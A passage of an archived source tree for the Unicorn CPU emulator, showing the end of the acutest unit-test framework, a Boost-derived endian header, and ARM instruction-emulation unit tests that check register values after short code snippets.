acutest_tap_ = 1; break; case 'l': acutest_list_names_(); acutest_exit_(0); break; case 'v': acutest_verbose_level_ = (arg != NULL ? 
atoi(arg) : acutest_verbose_level_ + 1); break; case 'q': acutest_verbose_level_ = 0; break; case 'c': if (arg == NULL || strcmp(arg, "always") == 0) { acutest_colorize_ = 1; } else if (strcmp(arg, "never") == 0) { acutest_colorize_ = 0; } else if (strcmp(arg, "auto") == 0) { /*noop*/ } else { fprintf(stderr, "%s: Unrecognized argument '%s' for option --color.\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); } break; case 'C': acutest_colorize_ = 0; break; case 'h': acutest_help_(); acutest_exit_(0); break; case 'w': acutest_worker_ = 1; acutest_worker_index_ = atoi(arg); break; case 'x': acutest_xml_output_ = fopen(arg, "w"); if (!acutest_xml_output_) { fprintf(stderr, "Unable to open '%s': %s\n", arg, strerror(errno)); acutest_exit_(2); } break; case 0: if (acutest_lookup_(arg) == 0) { fprintf(stderr, "%s: Unrecognized unit test '%s'\n", acutest_argv0_, arg); fprintf(stderr, "Try '%s --list' for list of unit tests.\n", acutest_argv0_); acutest_exit_(2); } break; case ACUTEST_CMDLINE_OPTID_UNKNOWN_: fprintf(stderr, "Unrecognized command line option '%s'.\n", arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); break; case ACUTEST_CMDLINE_OPTID_MISSINGARG_: fprintf(stderr, "The command line option '%s' requires an argument.\n", arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); break; case ACUTEST_CMDLINE_OPTID_BOGUSARG_: fprintf(stderr, "The command line option '%s' does not expect an argument.\n", arg); fprintf(stderr, "Try '%s --help' for more information.\n", acutest_argv0_); acutest_exit_(2); break; } return 0; } #ifdef ACUTEST_LINUX_ static int acutest_is_tracer_present_(void) { /* Must be large enough so the line 'TracerPid: ${PID}' can fit in. */ static const int OVERLAP = 32; char buf[256 + OVERLAP + 1]; int tracer_present = 0; int fd; size_t n_read = 0; fd = open("/proc/self/status", O_RDONLY); if (fd == -1) return 0; while (1) { static const char pattern[] = "TracerPid:"; const char *field; while (n_read < sizeof(buf) - 1) { ssize_t n; n = read(fd, buf + n_read, sizeof(buf) - 1 - n_read); if (n <= 0) break; n_read += n; } buf[n_read] = '\0'; field = strstr(buf, pattern); if (field != NULL && field < buf + sizeof(buf) - OVERLAP) { pid_t tracer_pid = (pid_t)atoi(field + sizeof(pattern) - 1); tracer_present = (tracer_pid != 0); break; } if (n_read == sizeof(buf) - 1) { memmove(buf, buf + sizeof(buf) - 1 - OVERLAP, OVERLAP); n_read = OVERLAP; } else { break; } } close(fd); return tracer_present; } #endif #ifdef ACUTEST_MACOS_ static bool acutest_AmIBeingDebugged(void) { int junk; int mib[4]; struct kinfo_proc info; size_t size; // Initialize the flags so that, if sysctl fails for some bizarre // reason, we get a predictable result. info.kp_proc.p_flag = 0; // Initialize mib, which tells sysctl the info we want, in this case // we're looking for information about a specific process ID. mib[0] = CTL_KERN; mib[1] = KERN_PROC; mib[2] = KERN_PROC_PID; mib[3] = getpid(); // Call sysctl. size = sizeof(info); junk = sysctl(mib, sizeof(mib) / sizeof(*mib), &info, &size, NULL, 0); assert(junk == 0); // We're being debugged if the P_TRACED flag is set. 
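// (This helper follows the sysctl(CTL_KERN, KERN_PROC, KERN_PROC_PID)
// technique from Apple's Technical Q&A QA1361, "Detecting the Debugger";
// P_TRACED is set on a process for as long as a debugger traces it.)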
return ((info.kp_proc.p_flag & P_TRACED) != 0); } #endif int main(int argc, char **argv) { int i; acutest_argv0_ = argv[0]; #if defined ACUTEST_UNIX_ acutest_colorize_ = isatty(STDOUT_FILENO); #elif defined ACUTEST_WIN_ #if defined __BORLANDC__ acutest_colorize_ = isatty(_fileno(stdout)); #else acutest_colorize_ = _isatty(_fileno(stdout)); #endif #else acutest_colorize_ = 0; #endif /* Count all test units */ acutest_list_size_ = 0; for (i = 0; acutest_list_[i].func != NULL; i++) acutest_list_size_++; acutest_test_data_ = (struct acutest_test_data_ *)calloc( acutest_list_size_, sizeof(struct acutest_test_data_)); if (acutest_test_data_ == NULL) { fprintf(stderr, "Out of memory.\n"); acutest_exit_(2); } /* Parse options */ acutest_cmdline_read_(acutest_cmdline_options_, argc, argv, acutest_cmdline_callback_); /* Initialize the proper timer. */ acutest_timer_init_(); #if defined(ACUTEST_WIN_) SetUnhandledExceptionFilter(acutest_seh_exception_filter_); #ifdef _MSC_VER _set_abort_behavior(0, _WRITE_ABORT_MSG); #endif #endif /* By default, we want to run all tests. */ if (acutest_count_ == 0) { for (i = 0; acutest_list_[i].func != NULL; i++) acutest_remember_(i); } /* Guess whether we want to run unit tests as child processes. */ if (acutest_no_exec_ < 0) { acutest_no_exec_ = 0; if (acutest_count_ <= 1) { acutest_no_exec_ = 1; } else { #ifdef ACUTEST_WIN_ if (IsDebuggerPresent()) acutest_no_exec_ = 1; #endif #ifdef ACUTEST_LINUX_ if (acutest_is_tracer_present_()) acutest_no_exec_ = 1; #endif #ifdef ACUTEST_MACOS_ if (acutest_AmIBeingDebugged()) acutest_no_exec_ = 1; #endif #ifdef RUNNING_ON_VALGRIND /* RUNNING_ON_VALGRIND is provided by optionally included * <valgrind.h> */ if (RUNNING_ON_VALGRIND) acutest_no_exec_ = 1; #endif } } if (acutest_tap_) { /* TAP requires we know test result ("ok", "not ok") before we output * anything about the test, and this gets problematic for larger verbose * levels. */ if (acutest_verbose_level_ > 2) acutest_verbose_level_ = 2; /* TAP harness should provide some summary. */ acutest_no_summary_ = 1; if (!acutest_worker_) printf("1..%d\n", (int)acutest_count_); } int index = acutest_worker_index_; for (i = 0; acutest_list_[i].func != NULL; i++) { int run = (acutest_test_data_[i].flags & ACUTEST_FLAG_RUN_); if (acutest_skip_mode_) /* Run all tests except those listed. */ run = !run; if (run) acutest_run_(&acutest_list_[i], index++, i); } /* Write a summary */ if (!acutest_no_summary_ && acutest_verbose_level_ >= 1) { if (acutest_verbose_level_ >= 3) { acutest_colored_printf_(ACUTEST_COLOR_DEFAULT_INTENSIVE_, "Summary:\n"); printf(" Count of all unit tests: %4d\n", (int)acutest_list_size_); printf(" Count of run unit tests: %4d\n", acutest_stat_run_units_); printf(" Count of failed unit tests: %4d\n", acutest_stat_failed_units_); printf(" Count of skipped unit tests: %4d\n", (int)acutest_list_size_ - acutest_stat_run_units_); } if (acutest_stat_failed_units_ == 0) { acutest_colored_printf_(ACUTEST_COLOR_GREEN_INTENSIVE_, "SUCCESS:"); printf(" All unit tests have passed.\n"); } else { acutest_colored_printf_(ACUTEST_COLOR_RED_INTENSIVE_, "FAILED:"); printf(" %d of %d unit tests %s failed.\n", acutest_stat_failed_units_, acutest_stat_run_units_, (acutest_stat_failed_units_ == 1) ? 
"has" : "have"); } if (acutest_verbose_level_ >= 3) printf("\n"); } if (acutest_xml_output_) { #if defined ACUTEST_UNIX_ char *suite_name = basename(argv[0]); #elif defined ACUTEST_WIN_ char suite_name[_MAX_FNAME]; _splitpath(argv[0], NULL, NULL, suite_name, NULL); #else const char *suite_name = argv[0]; #endif fprintf(acutest_xml_output_, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"); fprintf(acutest_xml_output_, "<testsuite name=\"%s\" tests=\"%d\" errors=\"%d\" " "failures=\"%d\" skip=\"%d\">\n", suite_name, (int)acutest_list_size_, acutest_stat_failed_units_, acutest_stat_failed_units_, (int)acutest_list_size_ - acutest_stat_run_units_); for (i = 0; acutest_list_[i].func != NULL; i++) { struct acutest_test_data_ *details = ´st_test_data_[i]; fprintf(acutest_xml_output_, " <testcase name=\"%s\" time=\"%.2f\">\n", acutest_list_[i].name, details->duration); if (details->flags & ACUTEST_FLAG_FAILURE_) fprintf(acutest_xml_output_, " <failure />\n"); if (!(details->flags & ACUTEST_FLAG_FAILURE_) && !(details->flags & ACUTEST_FLAG_SUCCESS_)) fprintf(acutest_xml_output_, " <skipped />\n"); fprintf(acutest_xml_output_, " </testcase>\n"); } fprintf(acutest_xml_output_, "</testsuite>\n"); fclose(acutest_xml_output_); } acutest_cleanup_(); return (acutest_stat_failed_units_ == 0) ? 0 : 1; } #endif /* #ifndef TEST_NO_MAIN */ #ifdef _MSC_VER #pragma warning(pop) #endif #ifdef __cplusplus } /* extern "C" */ #endif #endif /* #ifndef ACUTEST_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/endian.h�������������������������������������������������������������������0000664�0000000�0000000�00000005470�14675241067�0016742�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// Copy fron boost 1.43.0 // Copyright 2005 Caleb Epstein // Copyright 2006 John Maddock // Distributed under the Boost Software License, Version 1.0. (See accompany- // ing file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) /* * Copyright (c) 1997 * Silicon Graphics Computer Systems, Inc. * * Permission to use, copy, modify, distribute and sell this software * and its documentation for any purpose is hereby granted without fee, * provided that the above copyright notice appear in all copies and * that both that copyright notice and this permission notice appear * in supporting documentation. Silicon Graphics makes no * representations about the suitability of this software for any * purpose. It is provided "as is" without express or implied warranty. */ /* * Copyright notice reproduced from <boost/detail/limits.hpp>, from * which this code was originally taken. * * Modified by Caleb Epstein to use <endian.h> with GNU libc and to * defined the BOOST_ENDIAN macro. 
#ifndef BOOST_DETAIL_ENDIAN_HPP #define BOOST_DETAIL_ENDIAN_HPP // GNU libc offers the helpful header <endian.h> which defines // __BYTE_ORDER #if defined(__GLIBC__) #include <endian.h> #if (__BYTE_ORDER == __LITTLE_ENDIAN) #define BOOST_LITTLE_ENDIAN #elif (__BYTE_ORDER == __BIG_ENDIAN) #define BOOST_BIG_ENDIAN #elif (__BYTE_ORDER == __PDP_ENDIAN) #define BOOST_PDP_ENDIAN #else // Failsafe #define BOOST_LITTLE_ENDIAN #endif #define BOOST_BYTE_ORDER __BYTE_ORDER #elif defined(_BIG_ENDIAN) && !defined(_LITTLE_ENDIAN) #define BOOST_BIG_ENDIAN #define BOOST_BYTE_ORDER 4321 #elif defined(_LITTLE_ENDIAN) && !defined(_BIG_ENDIAN) #define BOOST_LITTLE_ENDIAN #define BOOST_BYTE_ORDER 1234 // https://developer.arm.com/documentation/dui0491/i/Compiler-specific-Features/Predefined-macros #elif defined(__sparc) || defined(__sparc__) || defined(_POWER) || \ defined(__powerpc__) || defined(__ppc__) || defined(__hpux) || \ defined(__hppa) || defined(_MIPSEB) || defined(_POWER) || \ defined(__s390__) || defined(__ARMEB__) || defined(__AARCH64EB__) || \ defined(__BIG_ENDIAN) || defined(__ARM_BIG_ENDIAN) #define BOOST_BIG_ENDIAN #define BOOST_BYTE_ORDER 4321 #elif defined(__i386__) || defined(__alpha__) || defined(__ia64) || \ defined(__ia64__) || defined(_M_IX86) || defined(_M_IA64) || \ defined(_M_ALPHA) || defined(__amd64) || defined(__amd64__) || \ defined(_M_AMD64) || defined(__x86_64) || defined(__x86_64__) || \ defined(_M_X64) || defined(__bfin__) || defined(__ARMEL__) || \ defined(__AARCH64EL__) || defined(__arm64__) || defined(__arm__) #define BOOST_LITTLE_ENDIAN #define BOOST_BYTE_ORDER 1234 #else // Failsafe #define BOOST_LITTLE_ENDIAN #define BOOST_BYTE_ORDER 1234 #endif #endif
unicorn-2.1.1/tests/unit/test_arm.c
#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size, uc_cpu_arm cpu) { OK(uc_open(arch, mode, uc)); OK(uc_ctl_set_cpu_model(*uc, cpu)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_arm_nop(void) { uc_engine *uc; char code[] = "\x00\xf0\x20\xe3"; // nop int r_r0 = 0x1234; int r_r2 = 0x6789; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); TEST_CHECK(r_r0 == 0x1234); TEST_CHECK(r_r2 == 0x6789); OK(uc_close(uc)); } static void test_arm_thumb_sub(void) { uc_engine *uc; char code[] = "\x83\xb0"; // sub sp, #0xc int r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, 
UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK(r_sp == 0x1228); OK(uc_close(uc)); } static void test_armeb_sub(void) { uc_engine *uc; char code[] = "\xe3\xa0\x00\x37\xe0\x42\x10\x03"; // mov r0, #0x37; sub r1, r2, r3 int r_r0 = 0x1234; int r_r2 = 0x6789; int r_r3 = 0x3333; int r_r1; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_1176); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r0 == 0x37); TEST_CHECK(r_r2 == 0x6789); TEST_CHECK(r_r3 == 0x3333); TEST_CHECK(r_r1 == 0x3456); OK(uc_close(uc)); } static void test_armeb_be8_sub(void) { uc_engine *uc; char code[] = "\x37\x00\xa0\xe3\x03\x10\x42\xe0"; // mov r0, #0x37; sub r1, r2, r3 int r_r0 = 0x1234; int r_r2 = 0x6789; int r_r3 = 0x3333; int r_r1; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM | UC_MODE_ARMBE8, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r0 == 0x37); TEST_CHECK(r_r2 == 0x6789); TEST_CHECK(r_r3 == 0x3333); TEST_CHECK(r_r1 == 0x3456); OK(uc_close(uc)); } static void test_arm_thumbeb_sub(void) { uc_engine *uc; char code[] = "\xb0\x83"; // sub sp, #0xc int r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1, UC_CPU_ARM_1176); OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK(r_sp == 0x1228); OK(uc_close(uc)); } static void test_arm_thumb_ite_count_callback(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { uint64_t *count = (uint64_t *)user_data; (*count) += 1; } static void test_arm_thumb_ite(void) { uc_engine *uc; uc_hook hook; char code[] = "\x9a\x42\x15\xbf\x00\x9a\x01\x9a\x78\x23\x15\x23"; // cmp r2, r3; itete // ne; ldrne r2, // [sp]; ldreq r2, // [sp,#4]; movne // r3, #0x78; moveq // r3, #0x15 int r_sp = 0x8000; int r_r2 = 0; int r_r3 = 1; int r_pc = 0; uint64_t count = 0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_mem_map(uc, r_sp, 0x1000, UC_PROT_ALL)); r_r2 = LEINT32(0x68); OK(uc_mem_write(uc, r_sp, &r_r2, 4)); r_r2 = LEINT32(0x4d); OK(uc_mem_write(uc, r_sp + 4, &r_r2, 4)); OK(uc_hook_add(uc, &hook, UC_HOOK_CODE, test_arm_thumb_ite_count_callback, &count, 1, 0)); // Execute four instructions at a time. 
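// Expected walk-through, derived from the test's own inputs: with r2 == 0
// and r3 == 1 the CMP sets NE, so the two "ne" slots of the ITETE block
// execute (ldrne loads 0x68 from [sp], movne sets r3 to 0x78) and the two
// "eq" slots are skipped. The code hook therefore fires for cmp, itete and
// the two executed slots, which is why count is checked against 4 below.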
OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r2 == 0x68); TEST_CHECK(count == 4); r_pc = code_start; r_r2 = 0; count = 0; OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); for (int i = 0; i < 6 && r_pc < code_start + sizeof(code) - 1; i++) { // Execute one instruction at a time. OK(uc_emu_start(uc, r_pc | 1, code_start + sizeof(code) - 1, 0, 1)); OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); } OK(uc_reg_read(uc, UC_ARM_REG_R2, &r_r2)); TEST_CHECK(r_r2 == 0x68); TEST_CHECK(r_r3 == 0x78); TEST_CHECK(count == 4); OK(uc_close(uc)); } static void test_arm_m_thumb_mrs(void) { uc_engine *uc; char code[] = "\xef\xf3\x14\x80\xef\xf3\x00\x81"; // mrs r0, control; mrs r1, apsr uint32_t r_control = 0b10; uint32_t r_apsr = (0b10101 << 27); uint32_t r_r0, r_r1; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_MCLASS, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_write(uc, UC_ARM_REG_APSR_NZCVQ, &r_apsr)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); TEST_CHECK(r_r0 == 0b10); TEST_CHECK(r_r1 == (0b10101 << 27)); OK(uc_close(uc)); } static void test_arm_m_control(void) { uc_engine *uc; int r_control, r_msp, r_psp; OK(uc_open(UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_MCLASS, &uc)); r_control = 0; // Make sure we are using MSP. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); r_msp = 0x1000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_msp)); r_control = 0b10; // Make the switch. OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_psp)); TEST_CHECK(r_psp != r_msp); r_psp = 0x2000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_psp)); r_control = 0; // Switch again OK(uc_reg_write(uc, UC_ARM_REG_CONTROL, &r_control)); OK(uc_reg_read(uc, UC_ARM_REG_R13, &r_msp)); TEST_CHECK(r_psp != r_msp); TEST_CHECK(r_msp == 0x1000); OK(uc_close(uc)); } // // Some notes: // Qemu raise a special exception EXCP_EXCEPTION_EXIT to handle the // EXC_RETURN. We can't help user handle EXC_RETURN since unicorn is designed // not to handle any CPU exception. // static void test_arm_m_exc_return_hook_interrupt(uc_engine *uc, int intno, void *data) { int r_pc; OK(uc_reg_read(uc, UC_ARM_REG_PC, &r_pc)); TEST_CHECK(intno == 8); // EXCP_EXCEPTION_EXIT: Return from v7M exception. TEST_CHECK((r_pc | 1) == 0xFFFFFFFD); OK(uc_emu_stop(uc)); } static void test_arm_m_exc_return(void) { uc_engine *uc; char code[] = "\x6f\xf0\x02\x00\x00\x47"; // mov r0, #0xFFFFFFFD; bx r0; int r_ipsr; int r_sp = 0x8000; uc_hook hook; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_MCLASS, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); OK(uc_mem_map(uc, r_sp - 0x1000, 0x1000, UC_PROT_ALL)); OK(uc_hook_add(uc, &hook, UC_HOOK_INTR, test_arm_m_exc_return_hook_interrupt, NULL, 0, 0)); r_sp -= 0x1c; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_ipsr = 16; // We are in whatever exception. OK(uc_reg_write(uc, UC_ARM_REG_IPSR, &r_ipsr)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 2)); // Just execute 2 instructions. OK(uc_hook_del(uc, hook)); OK(uc_close(uc)); } // For details, see https://github.com/unicorn-engine/unicorn/issues/1494. 
static void test_arm_und32_to_svc32(void) { uc_engine *uc; // # MVN r0, #0 // # MOVS pc, lr // # MVN r0, #0 // # MVN r0, #0 char code[] = "\x00\x00\xe0\xe3\x0e\xf0\xb0\xe1\x00\x00\xe0\xe3\x00\x00\xe0\xe3"; int r_cpsr, r_sp, r_spsr, r_lr; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_A9)); OK(uc_mem_map(uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(uc, code_start, code, sizeof(code) - 1)); // https://www.keil.com/pack/doc/CMSIS/Core_A/html/group__CMSIS__CPSR__M.html r_cpsr = 0x40000093; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_sp = 0x12345678; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_cpsr = 0x4000009b; // UND32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000093; // Save previous CPSR OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_sp = 0xDEAD0000; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = code_start + 8; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 3)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK(r_sp == 0x12345678); OK(uc_close(uc)); } static void test_arm_usr32_to_svc32(void) { uc_engine *uc; int r_cpsr, r_sp, r_spsr, r_lr; OK(uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc)); OK(uc_ctl_set_cpu_model(uc, UC_CPU_ARM_CORTEX_A9)); // https://www.keil.com/pack/doc/CMSIS/Core_A/html/group__CMSIS__CPSR__M.html r_cpsr = 0x40000093; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_sp = 0x12345678; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x00102220; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); r_cpsr = 0x4000009b; // UND32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000093; // Save previous CPSR OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_sp = 0xDEAD0000; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x00509998; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 0xb); // We are in UND32 r_cpsr = 0x40000090; // USR32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_sp = 0x0010000; OK(uc_reg_write(uc, UC_ARM_REG_R13, &r_sp)); r_lr = 0x0001234; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 0); // We are in USR32 r_cpsr = 0x40000093; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 3); // We are in SVC32 TEST_CHECK(r_sp == 0x12345678); OK(uc_close(uc)); } static void test_arm_v8(void) { char code[] = "\xd0\xe8\xff\x17"; // LDAEXD.W R1, [R0] uc_engine *uc; uint32_t r_r1 = LEINT32(0xdeadbeef); uint32_t r_r0; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_M33); r_r0 = 0x8000; OK(uc_mem_map(uc, r_r0, 0x1000, UC_PROT_ALL)); OK(uc_mem_write(uc, r_r0, (void *)&r_r1, 4)); OK(uc_reg_write(uc, UC_ARM_REG_R0, &r_r0)); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R1, &r_r1)); TEST_CHECK(r_r1 == 0xdeadbeef); OK(uc_close(uc)); } static void test_arm_thumb_smlabb(void) { char code[] = "\x13\xfb\x01\x23"; uint32_t r_r1, r_r2, r_r3; uc_engine *uc; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_M7); r_r3 = 5; r_r1 = 7; r_r2 = 9; OK(uc_reg_write(uc, UC_ARM_REG_R3, &r_r3)); OK(uc_reg_write(uc, UC_ARM_REG_R1, &r_r1)); OK(uc_reg_write(uc, UC_ARM_REG_R2, &r_r2)); 
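// "\x13\xfb\x01\x23" encodes SMLABB r3, r3, r1, r2: a signed multiply of
// the bottom halfwords plus accumulate, i.e. r3 = r3 * r1 + r2. With the
// values written above that is 5 * 7 + 9, matching the TEST_CHECK below.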
OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_R3, &r_r3)); TEST_CHECK(r_r3 == 5 * 7 + 9); OK(uc_close(uc)); } static void test_arm_not_allow_privilege_escalation(void) { uc_engine *uc; int r_cpsr, r_sp, r_spsr, r_lr; // E3C6601F : BIC r6, r6, #&1F // E3866013 : ORR r6, r6, #&13 // E121F006 : MSR cpsr_c, r6 ; switch to SVC32 (should be ineffective // from USR32) // E1A00000 : MOV r0,r0 EF000011 : SWI OS_Exit char code[] = "\x1f\x60\xc6\xe3\x13\x60\x86\xe3\x06\xf0\x21\xe1\x00\x00\xa0" "\xe1\x11\x00\x00\xef"; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_ARM, code, sizeof(code) - 1, UC_CPU_ARM_CORTEX_A15); // https://www.keil.com/pack/doc/CMSIS/Core_A/html/group__CMSIS__CPSR.html r_cpsr = 0x40000013; // SVC32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_spsr = 0x40000013; OK(uc_reg_write(uc, UC_ARM_REG_SPSR, &r_spsr)); r_sp = 0x12345678; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x00102220; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); r_cpsr = 0x40000010; // USR32 OK(uc_reg_write(uc, UC_ARM_REG_CPSR, &r_cpsr)); r_sp = 0x0010000; OK(uc_reg_write(uc, UC_ARM_REG_SP, &r_sp)); r_lr = 0x0001234; OK(uc_reg_write(uc, UC_ARM_REG_LR, &r_lr)); uc_assert_err( UC_ERR_EXCEPTION, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_ARM_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_ARM_REG_LR, &r_lr)); OK(uc_reg_read(uc, UC_ARM_REG_CPSR, &r_cpsr)); TEST_CHECK((r_cpsr & ((1 << 4) - 1)) == 0); // Stay in USR32 TEST_CHECK(r_lr == 0x1234); TEST_CHECK(r_sp == 0x10000); OK(uc_close(uc)); } static void test_arm_mrc(void) { uc_engine *uc; // mrc p15, #0, r1, c13, c0, #3 char code[] = "\x1d\xee\x70\x1f"; uc_common_setup(&uc, UC_ARCH_ARM, UC_MODE_THUMB, code, sizeof(code) - 1, UC_CPU_ARM_MAX); OK(uc_emu_start(uc, code_start | 1, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void 